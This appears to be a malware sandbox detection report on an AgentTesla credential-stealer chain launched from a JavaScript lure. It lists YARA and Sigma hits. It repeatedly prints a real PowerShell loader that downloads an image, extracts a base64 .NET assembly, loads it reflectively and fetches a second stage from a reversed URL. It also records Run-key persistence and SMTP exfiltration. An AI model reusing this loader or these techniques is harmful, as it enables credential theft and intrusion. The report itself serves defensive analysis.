7.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x35b0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35b81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35c0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35c9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35d07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35d79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35e0f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35e9f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.powershell.exe.1a8e949b578.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.powershell.exe.1a8e949b578.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.1a8e949b578.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33d0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33d81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33e0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33e9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33f07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33f79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3400f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3409f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.powershell.exe.1a8e949b578.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.powershell.exe.1a8e949b578.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.powershell.exe.1a8e949b578.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.powershell.exe.1a8e949b578.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x35b0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72d47:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35b81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72db9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35c0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72e43:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35c9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72ed5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35d07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72f3f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35d79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72fb1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35e0f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x73047:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35e9f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x730d7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 6 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7728.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

Networking

Sigma detected: RegAsm connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.230.212.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7944, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ?

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js", ProcessId: 7472, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\atrophiante.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7728, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js", ProcessId: 7856, ProcessName: cmd.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ?

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? 